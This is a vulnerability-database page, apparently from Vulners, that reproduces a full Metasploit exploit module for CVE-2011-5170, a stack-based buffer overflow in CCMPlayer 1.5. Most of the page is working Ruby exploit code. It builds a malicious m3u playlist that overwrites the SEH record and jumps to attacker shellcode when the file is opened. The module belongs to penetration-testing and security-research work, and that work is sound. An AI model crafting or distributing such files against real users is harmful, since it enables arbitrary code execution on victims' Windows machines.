Lucene search
K

CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow

🗓️ 02 Dec 2011 22:27:59Reported by Rh0Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow exploit for Window

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5170
30 Nov 201100:00
circl
Check Point Advisories
CCMPlayer Stack based Buffer Overflow (CVE-2011-5170)
9 Mar 201500:00
checkpoint_advisories
CVE
CVE-2011-5170
15 Sep 201217:00
cve
Cvelist
CVE-2011-5170
15 Sep 201217:00
cvelist
NVD
CVE-2011-5170
15 Sep 201217:55
nvd
Prion
Stack overflow
15 Sep 201217:55
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
        a m3u playlist with a long track name, a SEH exception record can be overwritten
        with parts of the controllable buffer. SEH execution is triggered after an
        invalid read of an injectable address, thus allowing arbitrary code execution.
        This module works on multiple Windows platforms including: Windows XP SP3,
        Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['Rh0'],	# discovery and metasploit module
      'References'     =>
        [
          ['CVE', '2011-5170'],
          ['OSVDB', '77453'],
          ['EDB', '18178']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space' => 0x1000,
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
          'DisableNops' => 'True',
          'StackAdjustment' => -3500,
        },
      'Platform'		=> 'win',
      'Targets'		=>
        [
          [
            'CCMPlayer 1.5',
            {
              # pop esi / pop ebx / ret (in ccmplay.exe)
              # tweak it if necessary
              'Ret' => 0x00403ca7,	# last NULL in buffer is accepted
              'Offset' => 0x1000
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-11-30', # to my knowledge
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.m3u']),
        ])
  end

  def exploit

    m3u = "C:\\"
    # shellcode
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
    m3u << payload.encoded
    # junk
    m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
    # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
    # to trigger SEH
    m3u << [0xffffffff].pack("V")
    # pad
    m3u << rand_text_alpha_upper(3)
    # long jmp: jmp far back to shellcode
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
    # NSEH: jmp short back to long jmp instruction
    m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
    # pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
    m3u << rand_text_alpha_upper(2)
    # SEH Exception Handler Address -> p/p/r
    m3u << [target.ret].pack("V")
    m3u << ".mp3\r\n"	# no crash without it

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
    file_create(m3u)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 29.3
EPSS0.31968
17